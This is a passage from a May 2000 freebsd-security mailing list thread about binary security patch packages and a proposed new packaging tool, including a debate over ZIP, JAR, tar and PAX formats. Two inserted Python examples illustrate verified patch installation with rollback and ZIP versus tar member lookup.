> binaries that will change over the course of a release will be minor.

The pkg_add tool takes care of this to some extent. If the FreeBSD-4.0p3 package depends on FreeBSD-4.0p2 which in turn depends on FreeBSD-4.0p1 and you attempt to pkg_add p3, it will either fetch and apply p1 and p2 from the same media before installing p3 or fail to install p3 with a helpful warning that p2 is not installed. In the case of installing the patches over the network, there should not be a reason why you could fetch p3 but not p2 or p1.

> The usefulness of this project will probably be very limited if you do not
> address the kernel issue. Many security fixes that I have seen since I joined
> the list have been in the form of kernel patches.

I suppose it would be enough to install the related kernel.GENERIC and updated kernel source files. We would probably want a way to disregard the source file updates unless the sources are already installed on the system.

As I said, these are EXACTLY the issues I am addressing for my employer, and am both happy to share (and commit) my code, and to receive design help.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                     Softweyr LLC
wes@softweyr.com                       http://softweyr.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 15:24:12 2000
Delivered-To: freebsd-security@freebsd.org
Received: from modemcable127.61-201-24.mtl.mc.videotron.net (modemcable127.61-201-24.mtl.mc.videotron.net [24.201.61.127]) by hub.freebsd.org (Postfix) with SMTP id 26D0937BB25 for ; Fri, 12 May 2000 15:24:08 -0700 (PDT) (envelope-from patrick@mindstep.com)
Received: (qmail 76832 invoked from network); 12 May 2000 22:24:06 -0000
Received: from patrak.local.mindstep.com (HELO PATRAK) (192.168.10.4) by jacuzzi.local.mindstep.com with SMTP; 12 May 2000 22:24:06 -0000
Message-ID: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com>
From: "Patrick Bihan-Faou"
To:
References:
Subject: New packaging tool (was Re: Applying patches with out a compiler)
Date: Fri, 12 May 2000 18:23:15 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

I am currently working on a new version of pkg_*, which will bring a few features that I feel are missing.

In no special order these are:
- better dependency checking
- versioning of packages (not just the name of the tar file)
- upgrades procedures from one version to the next
- definition of "sets" of files
- signature of files + verification using any of the supported hashes (MD4, MD5, SHA, RIPEMD)
- support for "special" files and file permissions (devices, flags, etc.)
- support for MTREE-like storage of directory hierarchies
- installing from remote locations (i.e. on NFS mounted disks) while setting the "installed package" database properly for the remote machine.
- support for file sets within the package (this can be used for supporting multiple architectures (alpha, i386) with one package)

So far I have implemented the creation of the package tar file and support files with most of these features. I also added enough smarts to update an existing package to the new format, so my changes are backward compatible.

One thing that I want to include, but I can't find a way to preserve "tar compatibility" is self-signature of the package itself. I am debating whether this is important enough that tar compatibility can be dropped or not...

I am also integrating this with the world build process so I can install many machines from a package.

I am doing this for another project so this is my work these days, and you can expect something within 2-3 weeks.

If there is enough interest in the FreeBSD community, I would like to contribute it to the project. Otherwise, I will probably only make it available as a port. However considering the potential benefits for the community at large, I think it would be nice to have this as the "standard" packaging tool.

I appreciate any comments/criticism on my work, so please don't be shy !!!

Patrick.
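
As an added example (not code from any poster and not the FreeBSD pkg tools): the patch-package behaviour discussed in this thread, with prerequisite patch levels, per-file hash verification before any file is replaced, an install record, and saved originals so removal restores the earlier state. The `manifest.json` layout, the function names and the use of SHA-256 in place of the hashes named above are assumptions, and the sample packages are constructed.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path


class PatchError(Exception):
    """The patch package must not be installed or removed."""


def build_patch(pkg, name, requires, files):
    """Write a constructed sample package: payload/ tree plus manifest.json."""
    manifest = {"name": name, "requires": list(requires), "files": {}}
    for rel, data in files.items():
        target = Path(pkg, "payload", rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)
        manifest["files"][rel] = hashlib.sha256(data).hexdigest()
    Path(pkg, "manifest.json").write_text(json.dumps(manifest))
    return Path(pkg)


def install_patch(pkg, root, db):
    """Check prerequisites and every file hash, then replace files under root."""
    pkg, root, db = Path(pkg), Path(root), Path(db)
    manifest = json.loads((pkg / "manifest.json").read_text())
    record = db / manifest["name"]
    if record.exists():  # reinstalling would overwrite the saved originals
        raise PatchError(manifest["name"] + " is already installed")
    missing = [r for r in manifest["requires"] if not (db / r).is_dir()]
    if missing:
        raise PatchError("install first: " + ", ".join(missing))
    # Verify everything before changing anything, so a bad package changes nothing.
    for rel, want in manifest["files"].items():
        if Path(rel).is_absolute() or ".." in Path(rel).parts:
            raise PatchError("unsafe path in manifest: " + rel)
        src = pkg / "payload" / rel
        if not src.is_file() or hashlib.sha256(src.read_bytes()).hexdigest() != want:
            raise PatchError("hash mismatch: " + rel)
    manifest["backed_up"] = []
    for rel in manifest["files"]:
        dest = root / rel
        if dest.exists():  # keep the original so removal can restore it
            saved = record / "backup" / rel
            saved.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(dest, saved)
            manifest["backed_up"].append(rel)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(pkg / "payload" / rel, dest)
    record.mkdir(parents=True, exist_ok=True)
    (record / "record.json").write_text(json.dumps(manifest))  # install record
    return manifest["name"]


def remove_patch(name, root, db):
    """Restore what a patch replaced, unless an installed patch requires it."""
    root, record = Path(root), Path(db, name)
    if not record.is_dir():
        raise PatchError(name + " is not installed")
    for other in Path(db).iterdir():
        rec = json.loads((other / "record.json").read_text())
        if name in rec["requires"]:
            raise PatchError(rec["name"] + " requires " + name)
    rec = json.loads((record / "record.json").read_text())
    for rel in rec["files"]:
        if rel in rec["backed_up"]:
            shutil.copy2(record / "backup" / rel, root / rel)
        else:
            (root / rel).unlink(missing_ok=True)  # file was new in this patch
    shutil.rmtree(record)


def demo():
    """Constructed sample run in a temporary directory; returns each outcome."""
    out, first = [], "secpatch_4.0-RELEASE_001"
    with tempfile.TemporaryDirectory() as tmp:
        root, db = Path(tmp, "root"), Path(tmp, "db")
        target = root / "bin" / "example"
        target.parent.mkdir(parents=True)
        target.write_bytes(b"vulnerable")
        p1 = build_patch(Path(tmp, "p1"), first, [], {"bin/example": b"fixed 1"})
        p2 = build_patch(Path(tmp, "p2"), "secpatch_4.0-RELEASE_002", [first],
                         {"bin/example": b"fixed 2"})
        (p2 / "payload" / "bin" / "example").write_bytes(b"tampered")
        steps = [(install_patch, p2), (install_patch, p1), (install_patch, p2),
                 (remove_patch, first)]
        for func, arg in steps:  # 001 missing; ok; tampered payload; rollback
            try:
                func(arg, root, db)
                out.append(target.read_bytes().decode())
            except PatchError as err:
                out.append(str(err))
    return out


if __name__ == "__main__":
    print(demo())
```

Because the hash and path checks run before the first file is copied, a rejected package leaves both the installed files and the install records unchanged.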

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 17: 6:34 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 3137637BD77 for ; Fri, 12 May 2000 17:06:23 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id SAA00693; Fri, 12 May 2000 18:06:03 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <391C9CBC.4E0ED8E5@softweyr.com>
Date: Fri, 12 May 2000 18:07:24 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Patrick Bihan-Faou
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Patrick Bihan-Faou wrote:
>
> Hi,
>
> I am currently working on a new version of pkg_*, which will bring a few
> features that I feel are missing.

Go back and read the message I wrote at the bottom of my first, big message on this subject, then talk to Jordan Hubbard before you get too deep into it. As I wrote before, it would be wasteful to do a lot of work on yet another new packaging system when it might be possible to build a foundation for what he wants in the future.

In my opinion, if we're going to replace the packaging system completely, a good starting point might be to turn the PAX code, or something of that nature, into a library and build on top of that.
The package-signing code I've produced uses the code already existing in OpenBSD 2.6, and places signatures between the gzip header and gzip compressed data. It's a clever use, and works quite well, because you only have to sign the compressed data, and don't have to worry about getting the gzip header or signature signed.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                     Softweyr LLC
wes@softweyr.com                       http://softweyr.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 12 18:37:14 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 137D237B834 for ; Fri, 12 May 2000 18:37:11 -0700 (PDT) (envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id TAA19365; Fri, 12 May 2000 19:37:01 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id TAA09188; Fri, 12 May 2000 19:37:00 -0600 (MDT) (envelope-from nate)
Date: Fri, 12 May 2000 19:37:00 -0600 (MDT)
Message-Id: <200005130137.TAA09188@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Wes Peters
Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
In-Reply-To: <391C9CBC.4E0ED8E5@softweyr.com>
References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > I am currently working on a new version of pkg_*, which will bring a few
> > features that I feel are missing.
>
> In my opinion, if we're going to replace the packaging system completely,
> a good starting point might be to turn the PAX code, or something of
> that nature, into a library and build on top of that.

Not PAX. ZIP, since PAX and tar both require you to read to the end of the file to determine the contents of the file, and don't allow you to do random access I/O and pull out individual files.

There are numerous advantages to using something like ZIP, including removing the requirement to 'unpack' the archive in a staging area, since we could now unpack it directly in its installation location.

ZIP also allows signatures, and we have lots of free software that we can leverage to implement the tools with it.

Nate

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 4:10:59 2000
Delivered-To: freebsd-security@freebsd.org
Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id 405B437BC49 for ; Sat, 13 May 2000 04:10:49 -0700 (PDT) (envelope-from robinson@netrinsics.com)
Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id TAA01730 for ; Sat, 13 May 2000 19:07:27 +0800 (GMT)
Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id TAA13455; Sat, 13 May 2000 19:11:47 +0800 (+0800) (envelope-from robinson)
Date: Sat, 13 May 2000 19:11:47 +0800 (+0800)
From: Michael Robinson
Message-Id: <200005131111.TAA13455@netrinsics.com>
To: nate@yogotech.com
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
Cc: freebsd-security@freebsd.org
In-Reply-To: <200005130137.TAA09188@nomad.yogotech.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams writes:
>There are numerous advantages to using something like ZIP, including
>removing the requirement to 'unpack' the archive in a staging area,
>since we
>could now unpack it directly in its installation location.
>
>ZIP also allows signatures, and we have lots of free software that we
>can leverage to implement the tools with it.

Or, heck, why not JAR format, seeing as it's a well-defined standard, does everything necessary, and has multiple interoperable implementations.

-Michael Robinson

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 8: 0:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id DAC4737BB23 for ; Sat, 13 May 2000 08:00:21 -0700 (PDT) (envelope-from wes@softweyr.com)
Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id JAA03635; Sat, 13 May 2000 09:00:10 -0600 (MDT) (envelope-from wes@softweyr.com)
Message-ID: <391D6E70.904FB463@softweyr.com>
Date: Sat, 13 May 2000 09:02:08 -0600
From: Wes Peters
Organization: Softweyr LLC
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams
Cc: Patrick Bihan-Faou , freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> <200005130137.TAA09188@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams wrote:
>
> > > I am currently working on a new version of pkg_*, which will bring a few
> > > features that I feel are missing.
> >
> > In my opinion, if we're going to replace the packaging system completely,
> > a good starting point might be to turn the PAX code, or something of
> > that nature, into a library and build on top of that.
>
> Not PAX.
> ZIP, since PAX and tar both require you to read to the end of
> the file to determine the contents of the file, and don't allow you to
> do random access I/O and pull out individual files.
>
> There are numerous advantages to using something like ZIP, including
> removing the requirement to 'unpack' the archive in a staging area,
> since we could now unpack it directly in its installation location.
>
> ZIP also allows signatures, and we have lots of free software that we
> can leverage to implement the tools with it.

Sounds great. So who wants to dive into libzip?

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                     Softweyr LLC
wes@softweyr.com                       http://softweyr.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 8: 2:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id AE4CA37B944 for ; Sat, 13 May 2000 08:02:43 -0700 (PDT) (envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id JAA26430; Sat, 13 May 2000 09:02:41 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id JAA04832; Sat, 13 May 2000 09:02:40 -0600 (MDT) (envelope-from nate)
Date: Sat, 13 May 2000 09:02:40 -0600 (MDT)
Message-Id: <200005131502.JAA04832@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Michael Robinson
Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
In-Reply-To: <200005131111.TAA13455@netrinsics.com>
References: <200005130137.TAA09188@nomad.yogotech.com> <200005131111.TAA13455@netrinsics.com>
X-Mailer: VM 6.34 under 19.16 "Lille"
 XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> >There are numerous advantages to using something like ZIP, including
> >removing the requirement to 'unpack' the archive in a staging area,
> >since we could now unpack it directly in its installation location.
> >
> >ZIP also allows signatures, and we have lots of free software that we
> >can leverage to implement the tools with it.
>
> Or, heck, why not JAR format, seeing as it's a well-defined standard, does
> everything necessary, and has multiple interoperable implementations.

FWIW, it's the same format. :) :)


Nate


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 8:41:43 2000
Delivered-To: freebsd-security@freebsd.org
Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97])
    by hub.freebsd.org (Postfix) with ESMTP id 1B16637B9CD
    for ; Sat, 13 May 2000 08:41:39 -0700 (PDT)
    (envelope-from robinson@netrinsics.com)
Received: from netrinsics.com ([202.108.133.96])
    by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id XAA18637
    for ; Sat, 13 May 2000 23:38:22 +0800 (GMT)
Received: (from robinson@localhost)
    by netrinsics.com (8.9.3/8.9.3) id XAA13898;
    Sat, 13 May 2000 23:42:38 +0800 (+0800)
    (envelope-from robinson)
Date: Sat, 13 May 2000 23:42:38 +0800 (+0800)
From: Michael Robinson
Message-Id: <200005131542.XAA13898@netrinsics.com>
To: nate@yogotech.com
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
Cc: freebsd-security@freebsd.org
In-Reply-To: <200005131502.JAA04832@nomad.yogotech.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams writes:
>> Or, heck, why not JAR format, seeing as it's a well-defined standard, does
>> everything necessary, and has multiple interoperable implementations.
>
>FWIW, it's the same format. :) :)

Not strictly true.
All JAR files are ZIP files, but not all ZIP files are JAR files.
From your paean to the benefits of ZIP files, it sounded like you might
go off and reinvent manifests, signature meta-data, and all the other
stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way.

    -Michael Robinson


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 9:44:36 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66])
    by hub.freebsd.org (Postfix) with ESMTP id 93BF937B50F
    for ; Sat, 13 May 2000 09:44:30 -0700 (PDT)
    (envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131])
    by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA27135;
    Sat, 13 May 2000 10:44:28 -0600 (MDT)
    (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost)
    by nomad.yogotech.com (8.8.8/8.8.8) id KAA05089;
    Sat, 13 May 2000 10:44:27 -0600 (MDT)
    (envelope-from nate)
Date: Sat, 13 May 2000 10:44:27 -0600 (MDT)
Message-Id: <200005131644.KAA05089@nomad.yogotech.com>
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
To: Michael Robinson
Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
In-Reply-To: <200005131542.XAA13898@netrinsics.com>
References: <200005131502.JAA04832@nomad.yogotech.com>
    <200005131542.XAA13898@netrinsics.com>
X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> >> Or, heck, why not JAR format, seeing as it's a well-defined standard, does
> >> everything necessary, and has multiple interoperable implementations.
> >
> >FWIW, it's the same format. :) :)
>
> Not strictly true.
> All JAR files are ZIP files, but not all ZIP files are
> JAR files.

True. When I talk about ZIP, I meant to contrast it with PAX and TAR,
not talk about details such as manifests, signatures (which are part of
ZIP BTW..), and such.


Nate


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sat May 13 23:46:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from dt051n0b.san.rr.com (dt051n0b.san.rr.com [204.210.32.11])
    by hub.freebsd.org (Postfix) with ESMTP id B320A37BD40
    for ; Sat, 13 May 2000 23:46:51 -0700 (PDT)
    (envelope-from DougB@gorean.org)
Received: from gorean.org (doug@master [10.0.0.2])
    by dt051n0b.san.rr.com (8.9.3/8.9.3) with ESMTP id XAA29405;
    Sat, 13 May 2000 23:46:36 -0700 (PDT)
    (envelope-from DougB@gorean.org)
Message-ID: <391E4BCC.6EA3DB59@gorean.org>
Date: Sat, 13 May 2000 23:46:36 -0700
From: Doug Barton
Organization: Triborough Bridge & Tunnel Authority
X-Mailer: Mozilla 4.72 [en] (X11; U; FreeBSD 5.0-CURRENT-0508 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: Nate Williams
Cc: Wes Peters , freebsd-security@FreeBSD.ORG
Subject: Re: New packaging tool (was Re: Applying patches with out a compiler)
References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com>
    <391C9CBC.4E0ED8E5@softweyr.com>
    <200005130137.TAA09188@nomad.yogotech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Nate Williams wrote:

> Not PAX. ZIP, since PAX and tar both require you to read to the end of
> the file to determine the contents of the file, and don't allow you to
> do random access I/O and pull out individual files.
>
> There are numerous advantages to using something like ZIP, including
> removing the requirement to 'unpack' the archive in a staging area,
> since we could now unpack it directly in its installation location.
>
> ZIP also allows signatures, and we have lots of free software that we
> can leverage to implement the tools with it.

I concur. I've always wondered why (info-)zip hasn't enjoyed more
popularity in the unix world. I used it extensively back when I ran OS/2,
and it has a lot of nice features.

Doug
--
    "Live free or die"
        - State motto of my ancestral homeland, New Hampshire

    Do YOU Yahoo!?


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
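
The ZIP versus tar/PAX access difference discussed in the messages above, as an added example that is not part of any message in this thread: a ZIP reader finds the central directory from a record at the tail of the file and seeks straight to one member, while a tar reader has to walk the headers from offset 0. The package file names and contents are constructed, and members are stored uncompressed so the raw bytes can be sliced directly.

```python
import io, struct, tarfile, zipfile

# Constructed sample package contents (not from the thread).
FILES = {"bin/tool": b"\x7fELF" + b"\0" * 3000,
         "etc/tool.conf": b"verbose=no\n",
         "+CONTENTS": b"@name tool-1.0\n"}

def build_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        for name, data in FILES.items():
            z.writestr(name, data)
    return buf.getvalue()

def build_tar():
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as t:
        for name, data in FILES.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            t.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def zip_index(blob):
    """Map name -> (local header offset, stored size) using only the central directory."""
    eocd = blob.rfind(b"PK\x05\x06")          # end-of-central-directory record at the tail
    count, _cd_size, pos = struct.unpack_from("<HII", blob, eocd + 10)
    index = {}
    for _ in range(count):                    # each directory entry is 46 bytes + variable fields
        csize, _usize, nlen, xlen, clen = struct.unpack_from("<IIHHH", blob, pos + 20)
        (offset,) = struct.unpack_from("<I", blob, pos + 42)
        index[blob[pos + 46:pos + 46 + nlen].decode()] = (offset, csize)
        pos += 46 + nlen + xlen + clen
    return index

def zip_read(blob, name):
    """Seek straight to one stored (uncompressed) member via its local header."""
    offset, csize = zip_index(blob)[name]
    nlen, xlen = struct.unpack_from("<HH", blob, offset + 26)
    start = offset + 30 + nlen + xlen
    return blob[start:start + csize]

def tar_read(blob, name):
    """Walk 512-byte headers from offset 0; return (data or None, headers visited)."""
    pos = visited = 0
    while blob[pos:pos + 512].strip(b"\0"):    # an all-zero block marks end of archive
        hdr, visited = blob[pos:pos + 512], visited + 1
        size = int(hdr[124:136].rstrip(b"\0 "), 8)   # size field is octal text
        if hdr[:100].rstrip(b"\0").decode() == name:
            return blob[pos + 512:pos + 512 + size], visited
        pos += 512 + (size + 511) // 512 * 512       # data is padded to 512-byte blocks
    return None, visited

if __name__ == "__main__":
    print(sorted(zip_index(build_zip())), tar_read(build_tar(), "absent"))
```

Proving that a name is absent from the tar archive costs a visit to every header, and a gzip-compressed tar additionally has to be decompressed sequentially to reach them.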